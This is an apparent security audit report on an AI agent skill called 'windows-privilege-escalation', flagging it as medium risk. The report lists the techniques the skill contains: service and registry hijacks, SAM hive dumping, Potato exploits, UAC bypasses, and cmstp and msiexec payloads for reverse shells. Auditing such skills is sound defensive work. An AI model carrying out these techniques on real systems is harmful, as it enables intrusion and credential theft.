windows-privilege-escalation
Warn
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous commands intended to escalate privileges by modifying system settings. Examples include reconfiguring service binary paths (
sc config), creating high-privilege scheduled tasks (Register-ScheduledTask), and performing registry hijacks to execute arbitrary code. - [CREDENTIALS_UNSAFE]: The playbook details methods for accessing and extracting highly sensitive system credentials. This includes instructions for dumping local registry hives (SAM, SYSTEM, SECURITY) for offline password extraction and techniques for searching stored credentials using
cmdkey. - [EXTERNAL_DOWNLOADS]: The skill references and links to a wide range of third-party exploit tools and security-focused GitHub repositories. It explicitly mentions the "Potato" exploit family (JuicyPotato, GodPotato), enumeration tools (winPEAS, PowerUp), and the UACME project for bypassing security controls.
- [REMOTE_CODE_EXECUTION]: The instructions include methods for executing external payloads, such as using
cmstp.exeto execute remote scriptlets or generating and running malicious MSI files viamsiexecto obtain reverse shells.
Audit Metadata